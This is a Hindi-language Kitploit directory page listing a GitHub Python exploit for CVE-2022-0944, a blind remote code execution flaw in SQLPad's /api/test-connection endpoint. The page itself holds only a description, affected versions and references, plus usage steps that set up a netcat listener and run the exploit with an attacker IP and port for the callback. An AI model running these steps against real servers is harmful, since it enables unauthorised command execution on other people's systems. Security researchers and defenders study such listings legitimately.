Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
sqlpad-rce-exploit-CVE-2022-0944 — CVE-2022-0944 के लिए Python एक्सप्लॉइट जो SQLPad में /api/test-connection एंडपॉइंट के माध्यम से netcat कॉलबैक के साथ ब्लाइंड रिमोट कोड निष्पादन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/0xroqeeb/sqlpad-rce-exploit-cve-2022-0944
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHub0xroqeeb/sqlpad-rce-exploit-cve-2022-0944

sqlpad-rce-exploit-CVE-2022-0944

CVE-2022-0944 के लिए Python एक्सप्लॉइट जो SQLPad में /api/test-connection एंडपॉइंट के माध्यम से netcat कॉलबैक के साथ ब्लाइंड रिमोट कोड निष्पादन सक्षम करता है।

रिपॉजिटरी देखें
92121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SQLPad RCE शोषण

यह रिपॉजिटरी SQLPad में CVE-2022-0944 के लिए एक शोषण स्क्रिप्ट शामिल करती है, एक कमजोरी जो /api/test-connection एंडपॉइंट के माध्यम से रिमोट कोड निष्पादन (RCE) की अनुमति देती है।

अवलोकन

प्रदान की गई स्क्रिप्ट (exploit.py) SQLPad में RCE कमजोरी का शोषण करने का तरीका प्रदर्शित करती है। स्क्रिप्ट कमजोर एंडपॉइंट पर एक पेलोड भेजती है, जो लक्ष्य सर्वर पर एक कमांड निष्पादित करती है।

विशेषताएँ

  • ब्लाइंड RCE: लक्ष्य सर्वर पर सीधे प्रतिक्रिया प्राप्त किए बिना कमांड निष्पादित करता है।
  • Netcat लिसनर: आउटपुट प्राप्त करने के लिए हमलावर की मशीन पर netcat लिसनर सेटअप की आवश्यकता होती है।

पूर्वापेक्षाएँ

  • Python 3.x
  • requests लाइब्रेरी (pip के माध्यम से स्थापित की जा सकती है)

उपयोग

  1. Netcat लिसनर सेट अप करें
root@kitploit:~
nc -lvnp 4444
  1. शोषण चलाएँ
root@kitploit:~
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>

प्रभावित संस्करण

  • 6.10.1 से पहले (इसे छोड़कर)

संदर्भ

  • Huntr - CVE-2022-0944
  • NVD - CVE-2022-0944
टूल डाउनलोड करें